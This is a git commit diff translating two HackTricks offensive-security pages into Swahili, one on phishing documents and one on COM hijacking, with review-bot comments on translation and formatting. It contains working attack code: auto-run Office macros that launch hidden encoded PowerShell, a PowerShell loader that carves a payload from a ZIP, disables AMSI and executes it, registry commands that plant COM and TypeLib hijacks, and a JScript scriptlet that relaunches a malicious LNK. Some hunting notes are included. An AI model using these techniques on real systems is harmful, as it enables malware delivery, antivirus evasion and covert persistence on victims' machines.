Translated ['src/generic-methodologies-and-resources/phishing-methodolog

This commit is contained in:
Translator 2025-08-28 22:49:47 +00:00
parent 6e56939ffc
commit d1109cd1ee
2 changed files with 145 additions and 36 deletions

View File

@ -1,40 +1,40 @@
# Phishing Files & Documents # Faili na Nyaraka za Phishing
{{#include ../../banners/hacktricks-training.md}} {{#include ../../banners/hacktricks-training.md}}
## Office Documents ## Nyaraka za Office
Microsoft Word hufanya uthibitisho wa data za faili kabla ya kufungua faili. Uthibitisho wa data unafanywa kwa njia ya utambuzi wa muundo wa data, dhidi ya kiwango cha OfficeOpenXML. Ikiwa hitilafu yoyote itatokea wakati wa utambuzi wa muundo wa data, faili inayochambuliwa haitafunguliwa. Microsoft Word hufanya uhakiki wa data za faili kabla ya kufungua faili. Uhakiki wa data hufanywa kwa njia ya utambuzi wa muundo wa data, kwa mujibu wa kiwango cha OfficeOpenXML. Ikiwa kosa lolote litatokea wakati wa utambuzi wa muundo wa data, faili inayochunguzwa haitafunguliwa.
Kwa kawaida, faili za Word zinazokuwa na macros hutumia kiambishi cha `.docm`. Hata hivyo, inawezekana kubadilisha jina la faili kwa kubadilisha kiambishi cha faili na bado kuhifadhi uwezo wao wa kutekeleza macros.\ Kwa kawaida, faili za Word zinazobeba macros hutumia extension ya `.docm`. Hata hivyo, inawezekana kubadilisha jina la faili kwa kubadilisha extension ya faili na bado kuhifadhi uwezo wake wa kutekeleza macros.\
Kwa mfano, faili ya RTF haisaidii macros, kwa muundo, lakini faili ya DOCM iliyobadilishwa kuwa RTF itashughulikiwa na Microsoft Word na itakuwa na uwezo wa kutekeleza macros.\ Kwa mfano, faili ya RTF haiungi mkono macros, kwa muundo, lakini faili ya DOCM iliyobadilishwa jina kuwa RTF itashughulikiwa na Microsoft Word na itakuwa na uwezo wa kutekeleza macros.\
Mifumo na mitambo sawa inatumika kwa programu zote za Microsoft Office Suite (Excel, PowerPoint n.k.). Mifumo ya ndani na taratibu sawa zinatumika kwa programu zote za Microsoft Office Suite (Excel, PowerPoint n.k.).
Unaweza kutumia amri ifuatayo kuangalia ni kiambishi gani kitakachotekelezwa na baadhi ya programu za Office: Unaweza kutumia amri ifuatayo kuangalia ni zipi extensions zitakazotekelezwa na baadhi ya programu za Office:
```bash ```bash
assoc | findstr /i "word excel powerp" assoc | findstr /i "word excel powerp"
``` ```
DOCX faili zinazorejelea templeti ya mbali (File Options Add-ins Manage: Templates Go) ambayo inajumuisha macros zinaweza "kutekeleza" macros pia. Faili za DOCX zinazorejelea template ya mbali (File Options Add-ins Manage: Templates Go) ambazo zinajumuisha macros zinaweza pia “kutekeleza” macros.
### Upakuaji wa Picha za Nje ### Kupakia Picha za Nje
Nenda kwa: _Insert --> Quick Parts --> Field_\ Nenda kwa: _Insert --> Quick Parts --> Field_\
_**Categories**: Links and References, **Filed names**: includePicture, na **Filename or URL**:_ http://\<ip>/whatever _**Categories**: Links and References, **Filed names**: includePicture, and **Filename or URL**:_ http://<ip>/whatever
![](<../../images/image (155).png>) ![](<../../images/image (155).png>)
### Backdoor za Macros ### Macros Backdoor
Inawezekana kutumia macros kuendesha msimbo wowote kutoka kwa hati. Inawezekana kutumia macros kuendesha arbitrary code kutoka kwenye document.
#### Kazi za Autoload #### Autoload functions
Kadri zinavyokuwa za kawaida, ndivyo uwezekano wa AV kuzitambua unavyoongezeka. Kadri zinavyokuwa za kawaida zaidi, ndivyo AV inavyoweza kuzitambua.
- AutoOpen() - AutoOpen()
- Document_Open() - Document_Open()
#### Mifano ya Msimbo wa Macros #### Macros Code Examples
```vba ```vba
Sub AutoOpen() Sub AutoOpen()
CreateObject("WScript.Shell").Exec ("powershell.exe -nop -Windowstyle hidden -ep bypass -enc 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") CreateObject("WScript.Shell").Exec ("powershell.exe -nop -Windowstyle hidden -ep bypass -enc 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")
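Review bot: `**Filed names**` in the includePicture instructions is a typo for Word's UI label `Field names` and survives in both columns, and the new column drops the backslash the old one had in `http://\<ip>/whatever`, so a markdown renderer may treat `<ip>` as an HTML tag and swallow it; suggest `**Field names**: includePicture` and either keeping `\<ip>` or wrapping the URL in backticks.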
@ -64,16 +64,16 @@ Dim proc As Object
Set proc = GetObject("winmgmts:\\.\root\cimv2:Win32_Process") Set proc = GetObject("winmgmts:\\.\root\cimv2:Win32_Process")
proc.Create "powershell <beacon line generated> proc.Create "powershell <beacon line generated>
``` ```
#### Ondoa metadata kwa mikono #### Ondoa metadata kwa mkono
Nenda kwenye **File > Info > Inspect Document > Inspect Document**, ambayo itafungua Document Inspector. Bonyeza **Inspect** kisha **Remove All** kando ya **Document Properties and Personal Information**. Nenda kwa **File > Info > Inspect Document > Inspect Document**, ambayo itafungua Document Inspector. Bonyeza **Inspect** kisha **Remove All** kando ya **Document Properties and Personal Information**.
#### Upanuzi wa Doc #### Extension ya Doc
Unapomaliza, chagua **Save as type** dropdown, badilisha muundo kutoka **`.docx`** hadi **Word 97-2003 `.doc`**.\ Ukimaliza, chagua dropdown ya **Save as type**, badilisha muundo kutoka **`.docx`** hadi **Word 97-2003 `.doc`**.\
Fanya hivi kwa sababu huwezi **kuhifadhi macro ndani ya `.docx`** na kuna **stigma** **kuhusu** upanuzi wa macro-enabled **`.docm`** (kwa mfano, ikoni ya thumbnail ina `!` kubwa na baadhi ya lango la wavuti/barua pepe linaweza kuzuia kabisa). Hivyo, upanuzi huu wa zamani wa `.doc` ni **mkataba bora**. Fanya hivyo kwa sababu **huwezi kuhifadhi macro's ndani ya `.docx`** na kuna **stigma** kuhusu ugani unaowezesha macro **`.docm`** (kwa mfano, icon ya thumbnail ina `!` kubwa na baadhi ya gateway za wavuti/baruapepe huvizuia kabisa). Kwa hiyo, **ugani wa kale `.doc` ndio suluhisho bora**.
#### Watengenezaji wa Macros Mbaya #### Vyanzo vya Malicious Macros
- MacOS - MacOS
- [**macphish**](https://github.com/cldrn/macphish) - [**macphish**](https://github.com/cldrn/macphish)
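Review bot: `macro's` in the new column of the `.doc` extension paragraph is a possessive apostrophe on a plural; the old column's `macro` (English `macros`) is right, so suggest `huwezi kuhifadhi macros ndani ya .docx`. The same paragraph and the heading above it also switch between `Extension` and `ugani` for the same concept; pick one term and use it for both.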
@ -81,9 +81,9 @@ Fanya hivi kwa sababu huwezi **kuhifadhi macro ndani ya `.docx`** na kuna **stig
## Faili za HTA ## Faili za HTA
HTA ni programu ya Windows ambayo **inaunganisha HTML na lugha za skripti (kama VBScript na JScript)**. Inaunda kiolesura cha mtumiaji na inatekelezwa kama programu "iliyokubaliwa kikamilifu", bila vizuizi vya mfano wa usalama wa kivinjari. HTA ni programu ya Windows inayochanganya **HTML na lugha za scripting (k.m. VBScript na JScript)**. Inaunda kiolesura cha mtumiaji na inaendeshwa kama programu "iliyothibitishwa kabisa", bila vikwazo vya mfano wa usalama wa kivinjari.
HTA inatekelezwa kwa kutumia **`mshta.exe`**, ambayo kwa kawaida **imewekwa** pamoja na **Internet Explorer**, ikifanya **`mshta` kuwa tegemezi kwa IE**. Hivyo ikiwa imeondolewa, HTAs hazitaweza kutekelezwa. HTA inaenzishwa kwa kutumia **`mshta.exe`**, ambayo kwa kawaida **imesakinishwa** pamoja na **Internet Explorer**, na kufanya **`mshta` inategemea IE**. Kwa hivyo ikiwa imeondolewa, HTA hazitaweza kutekelezwa.
```html ```html
<--! Basic HTA Execution --> <--! Basic HTA Execution -->
<html> <html>
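Review bot: the HTML comment opener `<--! Basic HTA Execution -->` is malformed in both columns (it should be `<!-- Basic HTA Execution -->`); as written the parser sees no comment and the text leaks into the rendered HTA, so fix it while this block is being touched. Separately, `iliyothibitishwa kabisa` reads as "fully verified" where the English source says "fully trusted"; `inayoaminika kikamilifu` keeps the security meaning, since the point of the sentence is the absence of the browser sandbox, not any verification step.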
@ -138,11 +138,11 @@ var_func
self.close self.close
</script> </script>
``` ```
## Kulazimisha Uthibitisho wa NTLM ## Kulazimisha NTLM Authentication
Kuna njia kadhaa za **kulazimisha uthibitisho wa NTLM "kijijini"**, kwa mfano, unaweza kuongeza **picha zisizoonekana** kwenye barua pepe au HTML ambazo mtumiaji atafikia (hata HTTP MitM?). Au tumia mwathirika **anwani ya faili** ambazo zita **anzisha** **uthibitisho** tu kwa **kufungua folda.** Kuna njia kadhaa za **kulazimisha NTLM authentication "kwa mbali"**, kwa mfano, unaweza kuongeza **picha zisizoonekana** kwenye barua pepe au HTML ambazo mtumiaji atazifungua (hata HTTP MitM?). Au mtumie mwathiriwa **anwani ya faili** zitakazowasababisha **authentication** tu kwa **ufunguaji wa folda.**
**Angalia mawazo haya na mengine kwenye kurasa zifuatazo:** **Tazama mawazo haya na zaidi kwenye kurasa zifuatazo:**
{{#ref}} {{#ref}}
@ -156,9 +156,60 @@ Kuna njia kadhaa za **kulazimisha uthibitisho wa NTLM "kijijini"**, kwa mfano, u
### NTLM Relay ### NTLM Relay
Usisahau kwamba huwezi tu kuiba hash au uthibitisho bali pia **fanya mashambulizi ya NTLM relay**: Usisahau kwamba huwezi kuiba tu hash au authentication pekee, bali pia unaweza **perform NTLM relay attacks**:
- [**Mashambulizi ya NTLM Relay**](../pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md#ntml-relay-attack) - [**NTLM Relay attacks**](../pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md#ntml-relay-attack)
- [**AD CS ESC8 (NTLM relay kwa vyeti)**](../../windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.md#ntlm-relay-to-ad-cs-http-endpoints-esc8) - [**AD CS ESC8 (NTLM relay to certificates)**](../../windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.md#ntlm-relay-to-ad-cs-http-endpoints-esc8)
## LNK Loaders + ZIP-Embedded Payloads (fileless chain)
Kampeni zenye ufanisi mkubwa hutuma ZIP inayojumuisha nyaraka mbili halali za kupotosha (PDF/DOCX) na .lnk hatari. Mbinu ni kwamba loader halisi ya PowerShell imehifadhiwa ndani ya bytes ghafi za ZIP baada ya alama ya kipekee, na .lnk huitaibua na kuiendesha kabisa kwenye kumbukumbu.
Mtiririko wa kawaida unaotekelezwa na .lnk PowerShell one-liner:
1) Tambua ZIP ya asili katika njia za kawaida: Desktop, Downloads, Documents, %TEMP%, %ProgramData%, na folda mzazi ya current working directory.
2) Soma bytes za ZIP na utafute marker uliowekwa kwenye msimbo (mfano, xFIQCV). Yote yanayofuata marker ni PowerShell payload iliyojazwa ndani.
3) Nakili ZIP hadi %ProgramData%, itolee hapo (extract), kisha fungua .docx ya kupotosha ili ionekane halali.
4) Bypass AMSI kwa process ya sasa: [System.Management.Automation.AmsiUtils]::amsiInitFailed = $true
5) Deobfuscate hatua inayofuata (kwa mfano, ondoa tabia zote za #) na uitekeleze kwenye kumbukumbu.
Mfano wa skeleton ya PowerShell ili kuibua na kuendesha hatua iliyojazwa ndani:
```powershell
$marker = [Text.Encoding]::ASCII.GetBytes('xFIQCV')
$paths = @(
"$env:USERPROFILE\Desktop", "$env:USERPROFILE\Downloads", "$env:USERPROFILE\Documents",
"$env:TEMP", "$env:ProgramData", (Get-Location).Path, (Get-Item '..').FullName
)
$zip = Get-ChildItem -Path $paths -Filter *.zip -ErrorAction SilentlyContinue -Recurse | Sort-Object LastWriteTime -Descending | Select-Object -First 1
if(-not $zip){ return }
$bytes = [IO.File]::ReadAllBytes($zip.FullName)
$idx = [System.MemoryExtensions]::IndexOf($bytes, $marker)
if($idx -lt 0){ return }
$stage = $bytes[($idx + $marker.Length) .. ($bytes.Length-1)]
$code = [Text.Encoding]::UTF8.GetString($stage) -replace '#',''
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
Invoke-Expression $code
```
Notes
- Usambazaji mara nyingi unatumia vibamba vya subdomain vya PaaS vinavyoaminika (e.g., *.herokuapp.com) na unaweza gate payloads (kutumia ZIP zisizo hatari kulingana na IP/UA).
- Hatua inayofuata mara nyingi hu-decrypt base64/XOR shellcode na kuiendesha kupitia Reflection.Emit + VirtualAlloc ili kupunguza athari za diski.
Persistence used in the same chain
- COM TypeLib hijacking of the Microsoft Web Browser control ili IE/Explorer au programu yoyote inayoiingiza ianze upya payload kiotomatiki. See details and ready-to-use commands here:
{{#ref}}
../../windows-hardening/windows-local-privilege-escalation/com-hijacking.md
{{#endref}}
Hunting/IOCs
- ZIP files zenye kamba ya alama ya ASCII (e.g., xFIQCV) iliyoongezwa kwenye data ya archive.
- .lnk inayoorodhesha folda za mzazi/mtumiaji ili kupata ZIP na kufungua nyaraka ya kudanganya.
- Kuchezewa kwa AMSI kupitia [System.Management.Automation.AmsiUtils]::amsiInitFailed.
- Nyuzi za biashara zinazodumu muda mrefu zikimalizika kwa viungo vinavyoandikwa chini ya vikoa vya PaaS vinavyoaminika.
## References
- [Check Point Research ZipLine Campaign: A Sophisticated Phishing Attack Targeting US Companies](https://research.checkpoint.com/2025/zipline-phishing-campaign/)
- [Hijack the TypeLib New COM persistence technique (CICADA8)](https://cicada-8.medium.com/hijack-the-typelib-new-com-persistence-technique-32ae1d284661)
{{#include ../../banners/hacktricks-training.md}} {{#include ../../banners/hacktricks-training.md}}
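Review bot: the labels `Notes`, `Persistence used in the same chain` and `Hunting/IOCs` in the ZipLine section are bare, untranslated English lines where the rest of the file uses `####` headings, and the sentence `See details and ready-to-use commands here:` is left in English inside Swahili text; suggest `#### Vidokezo`, `#### Persistence iliyotumika katika mnyororo huo huo` and `#### Hunting/IOCs`, plus translating that sentence. Two further checks: the link anchor `#ntml-relay-attack` in the NTLM Relay list looks like a transposition of `ntlm`, so confirm it matches the heading id in the target file; and the Hunting/IOCs list would be more actionable if it named the two observable artifacts already implied by the skeleton above it, a PowerShell process launched from the `.lnk` that enumerates `*.zip` under the user profile, and the reflection string `amsiInitFailed` appearing in PowerShell script block logging (event ID 4104).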

View File

@ -2,15 +2,15 @@
{{#include ../../banners/hacktricks-training.md}} {{#include ../../banners/hacktricks-training.md}}
### Kutafuta sehemu za COM zisizopo ### Kutafuta vipengele vya COM visivyopo
Kwa kuwa thamani za HKCU zinaweza kubadilishwa na watumiaji, **COM Hijacking** inaweza kutumika kama **mekanismu ya kudumu**. Kwa kutumia `procmon` ni rahisi kupata rejista za COM zilizotafutwa ambazo hazipo ambazo mshambuliaji anaweza kuunda ili kudumu. Filters: Kama thamani za HKCU zinaweza kubadilishwa na watumiaji, **COM Hijacking** inaweza kutumika kama **mbinu za kudumu**. Kutumia `procmon` ni rahisi kupata rejista za COM zilizoombwa ambazo hazipo na ambazo mshambuliaji anaweza kuziunda ili kudumu. Vichujio:
- **RegOpenKey** operations. - **RegOpenKey** operations.
- ambapo _Result_ ni **NAME NOT FOUND**. - ambapo _Result_ ni **NAME NOT FOUND**.
- na _Path_ inamalizika na **InprocServer32**. - na _Path_ inamalizika na **InprocServer32**.
Mara tu unapokuwa umeamua ni COM ipi isiyopo unayotaka kuiga, tekeleza amri zifuatazo. _Kuwa makini ikiwa unataka kuiga COM inayopakuliwa kila sekunde chache kwani hiyo inaweza kuwa kupita kiasi._ Mara uamapoamua ni COM gani isiyokuwepo kuigiza, tekeleza amri zifuatazo. _Angalia kwa uangalifu ikiwa utaamua kuiga COM ambayo inapakiwa kila sekunde chache kwani hiyo inaweza kuwa ya kupitiliza._
```bash ```bash
New-Item -Path "HKCU:Software\Classes\CLSID" -Name "{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}" New-Item -Path "HKCU:Software\Classes\CLSID" -Name "{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}"
New-Item -Path "HKCU:Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}" -Name "InprocServer32" -Value "C:\beacon.dll" New-Item -Path "HKCU:Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}" -Name "InprocServer32" -Value "C:\beacon.dll"
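Review bot: `Mara uamapoamua` in the new column is a typo; `Mara utakapoamua` (or the old column's `Mara tu unapokuwa umeamua`) reads correctly. Separately, the fence is tagged ```bash in both columns although the block is PowerShell (`New-Item -Path "HKCU:Software\Classes\CLSID" ...`), so syntax highlighting is wrong; ```powershell matches the later blocks in this file.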
@ -18,7 +18,7 @@ New-ItemProperty -Path "HKCU:Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F
``` ```
### Hijackable Task Scheduler COM components ### Hijackable Task Scheduler COM components
Windows Tasks hutumia Custom Triggers kuita COM objects na kwa sababu zinafanywa kupitia Task Scheduler, ni rahisi kutabiri wakati zitakapoitwa. Windows Tasks zinatumia Custom Triggers kuita COM objects, na kwa sababu zinaendeshwa kupitia Task Scheduler, ni rahisi kutabiri lini zitaanzishwa.
<pre class="language-powershell"><code class="lang-powershell"># Show COM CLSIDs <pre class="language-powershell"><code class="lang-powershell"># Show COM CLSIDs
$Tasks = Get-ScheduledTask $Tasks = Get-ScheduledTask
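Review bot: the Task Scheduler block is written as raw `<pre class="language-powershell"><code class="lang-powershell">` HTML where every other block in this file uses a fenced ```powershell block; converting it keeps the translated file consistent and avoids the HTML-in-markdown special case.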
@ -49,9 +49,9 @@ Write-Host
# CLSID: {1936ED8A-BD93-3213-E325-F38D112938E1} # CLSID: {1936ED8A-BD93-3213-E325-F38D112938E1}
# [more like the previous one...]</code></pre> # [more like the previous one...]</code></pre>
Kuangalia matokeo unaweza kuchagua moja ambayo itatekelezwa **kila wakati mtumiaji anapoingia** kwa mfano. Ukikagua matokeo unaweza kuchagua moja ambayo itaendeshwa **kila wakati mtumiaji anapoingia** kwa mfano.
Sasa kutafuta CLSID **{1936ED8A-BD93-3213-E325-F38D112938EF}** katika **HKEY\CLASSES\ROOT\CLSID** na katika HKLM na HKCU, kwa kawaida utaona kwamba thamani hiyo haipo katika HKCU. Sasa unapochunguza CLSID **{1936ED8A-BD93-3213-E325-F38D112938EF}** katika **HKEY\CLASSES\ROOT\CLSID** na katika HKLM na HKCU, kawaida utagundua kwamba thamani haipo katika HKCU.
```bash ```bash
# Exists in HKCR\CLSID\ # Exists in HKCR\CLSID\
Get-ChildItem -Path "Registry::HKCR\CLSID\{1936ED8A-BD93-3213-E325-F38D112938EF}" Get-ChildItem -Path "Registry::HKCR\CLSID\{1936ED8A-BD93-3213-E325-F38D112938EF}"
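Review bot: `**HKEY\CLASSES\ROOT\CLSID**` looks like a markdown-escaping casualty of `HKEY_CLASSES_ROOT\CLSID` (the underscores were escaped as `\_` and then lost); suggest writing it in backticks as `HKEY_CLASSES_ROOT\CLSID` or as `HKCR\CLSID`, which the `Get-ChildItem -Path "Registry::HKCR\CLSID\..."` line below already does. Also the CLSID quoted in the prose and in that command ends in `...938EF` while the task output above lists `...938E1`; if these are meant to be the same component, one of them is wrong.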
@ -72,6 +72,64 @@ Name Property
PS C:\> Get-Item -Path "HKCU:Software\Classes\CLSID\{01575CFE-9A55-4003-A5E1-F38D1EBDCBE1}" PS C:\> Get-Item -Path "HKCU:Software\Classes\CLSID\{01575CFE-9A55-4003-A5E1-F38D1EBDCBE1}"
Get-Item : Cannot find path 'HKCU:\Software\Classes\CLSID\{01575CFE-9A55-4003-A5E1-F38D1EBDCBE1}' because it does not exist. Get-Item : Cannot find path 'HKCU:\Software\Classes\CLSID\{01575CFE-9A55-4003-A5E1-F38D1EBDCBE1}' because it does not exist.
``` ```
Kisha, unaweza tu kuunda kiingilio cha HKCU na kila wakati mtumiaji anapoingia, nyuma yako itawashwa. Kisha, unaweza tu kuunda kiingilio cha HKCU na kila mtumiaji anapoingia, backdoor yako itaanzishwa.
---
## COM TypeLib Hijacking (script: moniker persistence)
Type Libraries (TypeLib) zinaelezea COM interfaces na zinaingizwa kupitia `LoadTypeLib()`. Wakati COM server inapoanzishwa, OS pia inaweza kuingiza TypeLib inayohusiana kwa kushauriana na funguo za rejista chini ya `HKCR\TypeLib\{LIBID}`. Ikiwa njia ya TypeLib itabadilishwa na **moniker**, mfano `script:C:\...\evil.sct`, Windows itatekeleza scriptlet wakati TypeLib inapogunduliwa — na kusababisha persistence ya kimyakimya inayochochewa wakati vipengele vya kawaida vinapoguswa.
Hii imeonekana dhidi ya Microsoft Web Browser control (inayoingizwa mara kwa mara na Internet Explorer, programu zinazojumuisha WebBrowser, na hata `explorer.exe`).
### Hatua (PowerShell)
1) Tambua TypeLib (LIBID) inayotumiwa na CLSID inayotumika mara kwa mara. Mfano wa CLSID unaotumika mara nyingi na minyororo ya malware: {EAB22AC0-30C1-11CF-A7EB-0000C05BAE0B} (Microsoft Web Browser).
```powershell
$clsid = '{EAB22AC0-30C1-11CF-A7EB-0000C05BAE0B}'
$libid = (Get-ItemProperty -Path "Registry::HKCR\\CLSID\\$clsid\\TypeLib").'(default)'
$ver = (Get-ChildItem "Registry::HKCR\\TypeLib\\$libid" | Select-Object -First 1).PSChildName
"CLSID=$clsid LIBID=$libid VER=$ver"
```
2) Elekeza njia ya TypeLib ya mtumiaji mmoja kwa scriptlet ya ndani ukitumia moniker `script:` (no admin rights required):
```powershell
$dest = 'C:\\ProgramData\\Udate_Srv.sct'
New-Item -Path "HKCU:Software\\Classes\\TypeLib\\$libid\\$ver\\0\\win32" -Force | Out-Null
Set-ItemProperty -Path "HKCU:Software\\Classes\\TypeLib\\$libid\\$ver\\0\\win32" -Name '(default)' -Value "script:$dest"
```
3) Drop JScript `.sct` ndogo kabisa inayowasha tena primary payload yako (kwa mfano `.lnk` inayotumiwa na initial chain):
```xml
<?xml version="1.0"?>
<scriptlet>
<registration progid="UpdateSrv" classid="{F0001111-0000-0000-0000-0000F00D0001}" description="UpdateSrv"/>
<script language="JScript">
<![CDATA[
try {
var sh = new ActiveXObject('WScript.Shell');
// Re-launch the malicious LNK for persistence
var cmd = 'cmd.exe /K set X=1&"C:\\ProgramData\\NDA\\NDA.lnk"';
sh.Run(cmd, 0, false);
} catch(e) {}
]]>
</script>
</scriptlet>
```
4) Kuchochea kufungua IE, programu inayojumuisha WebBrowser control, au hata shughuli za kawaida za Explorer zitapakia TypeLib na kutekeleza scriptlet, zikirejesha mnyororo wako wakati wa logon/reboot.
Usafishaji
```powershell
# Remove the per-user TypeLib hijack
Remove-Item -Recurse -Force "HKCU:Software\\Classes\\TypeLib\\$libid\\$ver" 2>$null
# Delete the dropped scriptlet
Remove-Item -Force 'C:\\ProgramData\\Udate_Srv.sct' 2>$null
```
Vidokezo
- Unaweza kutumia mantiki ile ile kwa COM components nyingine zinazotumika mara kwa mara; daima pata `LIBID` halisi kutoka `HKCR\CLSID\{CLSID}\TypeLib` kwanza.
- Kwenye mifumo ya 64-bit unaweza pia kujaza subkey ya `win64` kwa watumiaji wa 64-bit.
## Marejeo
- [Hijack the TypeLib New COM persistence technique (CICADA8)](https://cicada-8.medium.com/hijack-the-typelib-new-com-persistence-technique-32ae1d284661)
- [Check Point Research ZipLine Campaign: A Sophisticated Phishing Attack Targeting US Companies](https://research.checkpoint.com/2025/zipline-phishing-campaign/)
{{#include ../../banners/hacktricks-training.md}} {{#include ../../banners/hacktricks-training.md}}
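Review bot: the PowerShell blocks in the TypeLib section carry doubled backslashes (`"Registry::HKCR\\CLSID\\$clsid\\TypeLib"`, `'C:\\ProgramData\\Udate_Srv.sct'`) that look like an escaping artifact from the source; PowerShell does not use backslash escaping, and the earlier `New-Item -Path "HKCU:Software\Classes\CLSID"` block in this same file uses single backslashes, so the two styles should be reconciled (the `\\` inside the JScript string in the `.sct` is correct for that language). Style points: `Usafishaji` and `Vidokezo` are bare lines where the file uses `###`/`####` headings, `no admin rights required` and `Drop JScript` mix untranslated English into Swahili sentences, and the `---` rule above the section is not used elsewhere in the file. Finally, unlike the ZipLine section added to the first file, this section has no hunting guidance; the registry write in step 2 gives defenders a concrete artifact, a `(default)` value under `HKCU\Software\Classes\TypeLib\{LIBID}\{ver}\0\win32` that starts with `script:`, which is worth stating next to the cleanup block.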